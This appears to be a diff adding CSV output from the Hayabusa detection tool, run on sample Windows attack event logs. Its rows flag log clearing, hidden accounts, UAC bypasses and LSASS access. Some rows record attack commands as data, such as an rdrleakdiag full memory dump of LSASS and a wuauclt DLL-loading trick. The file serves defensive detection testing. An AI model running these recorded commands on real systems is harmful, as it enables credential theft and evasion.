+2020-09-02 20:47:48.823 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown  :  Workstation: -  :  IP Address: 172.16.66.142  :  Port: 60728  :  LogonID: 0x21a8c80,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
+2020-09-02 20:47:48.842 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown  :  Workstation: -  :  IP Address: 172.16.66.142  :  Port: 60726  :  LogonID: 0x21a8c9a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
+2020-09-05 22:28:40.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3004 -s 632  :  Path: C:\Windows\System32\WerFault.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
+2020-09-05 22:33:34.590 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3668 -s 4420  :  Path: C:\Windows\System32\WerFault.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
+2020-09-05 22:34:11.983 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa3cea855 /state1:0x41c64e6d  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
+2020-09-05 22:37:07.245 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3bd2855 /state1:0x41c64e6d  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
+2020-09-09 22:18:23.627 +09:00,MSEDGEWIN10,4625,low,Logon Failure - Wrong Password,User: IEUser  :  Type: 2  :  Workstation: MSEDGEWIN10  :  IP Address: -  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx
+2020-09-09 22:18:27.714 +09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: MSEDGEWIN10  :  IP Address: -  :  Port: -  :  LogonID: 0x1cd8f6  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx
+2020-09-09 22:18:27.714 +09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: MSEDGEWIN10  :  IP Address: -  :  Port: -  :  LogonID: 0x1cd964  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx
+2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx
+2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx
+2020-09-14 23:44:04.878 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx
+2020-09-16 03:04:36.333 +09:00,MSEDGEWIN10,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx
+2020-09-16 03:04:39.987 +09:00,MSEDGEWIN10,4648,informational,Explicit Logon,Source User: svc01  :  Target User: IEUser  :  IP Address: -  :  Process: C:\Windows\System32\inetsrv\w3wp.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx
+2020-09-16 04:28:17.594 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx
+2020-09-16 04:28:31.453 +09:00,01566s-win16-ir.threebeesco.com,104,high,System log file was cleared,User: a-jbrown,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_CVE-2020-1472_DFIR_System_NetLogon_Error_EventID_5805.evtx
+2020-09-16 04:29:51.507 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON  :  Workstation: 02694W-WIN10  :  IP Address: 172.16.66.37  :  Port: 49707  :  LogonID: 0x31ff6e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx
+2020-09-16 04:29:51.517 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON  :  Workstation: 02694W-WIN10  :  IP Address: 172.16.66.37  :  Port: 49707  :  LogonID: 0x31ff89,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx
+2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $  :  SID:S-1-5-21-308926384-506822093-3341789130-107103,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx
+2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $  :  SID:S-1-5-21-308926384-506822093-3341789130-107104,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx
+2020-09-17 19:57:37.013 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx
+2020-09-17 19:57:44.254 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator  :  Workstation 02694W-WIN10  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx
+2020-09-17 19:57:44.270 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator  :  Workstation: 02694W-WIN10  :  IP Address: 172.16.66.37  :  Port: 49959  :  LogonID: 0x853237,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx
+2020-09-24 01:49:41.578 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:49:44.353 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6}  :  Path: C:\Windows\System32\dllhost.exe  :  User: 3B\Administrator  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:49:44.380 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{49F6E667-6658-4BD1-9DE9-6AF87F9FAF85}  :  Path: C:\Windows\System32\dllhost.exe  :  User: 3B\Administrator  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator  :  Workstation   :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator  :  Workstation: -  :  IP Address: 172.16.66.37  :  Port: 50106  :  LogonID: 0x1136e95,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:50:16.702 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:50:16.892 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 5424 -s 4616  :  Path: C:\Windows\System32\WerFault.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator  :  Workstation   :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator  :  Workstation: -  :  IP Address: 172.16.66.37  :  Port: 50107  :  LogonID: 0x1137987,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:50:17.200 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:50:19.821 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\wermgr.exe -upload  :  Path: C:\Windows\System32\wermgr.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,"Command: rdrleakdiag.exe  /p 668 /o C:\Users\wanwan\Desktop /fullmemdmp /snap  :  Path: C:\Windows\System32\rdrleakdiag.exe  :  User: DESKTOP-PIU87N6\wanwan  :  Parent Command: ""C:\WINDOWS\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
+2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,Command: C:\WINDOWS\system32\lsass.exe  :  Path: C:\Windows\System32\lsass.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\WINDOWS\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
+2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,critical,Suspicious LSASS Process Clone,,rules/sigma/process_creation/win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
+2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: POC.exe  :  Path: C:\Users\Public\POC\bin\Debug\POC.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
+2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
+2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: Program  :  Path: C:\Users\Public\POC\bin\Debug\POC.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: POC.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
+2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
+2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe  :  Path: C:\Windows\System32\Taskmgr.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: Akagi_64.exe  59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe  :  Path: C:\Windows\System32\Taskmgr.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: Akagi_64.exe  59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
+2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\Windows\System32\mmc.exe"" WF.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
+2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
+2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
+2020-10-07 06:40:30.910 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx
+2020-10-07 06:40:42.943 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx
+2020-10-07 07:11:17.814 +09:00,02694w-win10.threebeesco.com,13,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
+2020-10-07 07:11:17.848 +09:00,02694w-win10.threebeesco.com,12,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
+2020-10-14 05:11:42.278 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: wuauclt.exe   /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx
+2020-10-14 05:11:42.279 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: wuauclt.exe   /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx
+2020-10-15 22:17:02.403 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\smartscreen.exe -Embedding  :  Path: C:\Windows\System32\smartscreen.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
+2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
+2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
+2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,high,New RUN Key Pointing to Suspicious Folder,,rules/sigma/registry_event/sysmon_susp_run_key_img_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
+2020-10-15 22:17:02.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Internet Explorer\iexplore.exe""  :  Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Users\Public\tools\apt\tendyron.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
+2020-10-17 20:38:58.613 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download  :  URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe""   :  Path: C:\Users\Public\tools\apt\wwlib\test.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe""   :  Path: C:\Users\Public\tools\apt\wwlib\test.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:33.495 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart  :  Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe""  :  Path: C:\Windows\SysWOW64\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:40.902 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\explorer.exe""  :  Path: C:\Windows\SysWOW64\explorer.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,high,CACTUSTORCH Remote Thread Creation,,rules/sigma/create_remote_thread/sysmon_cactustorch.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
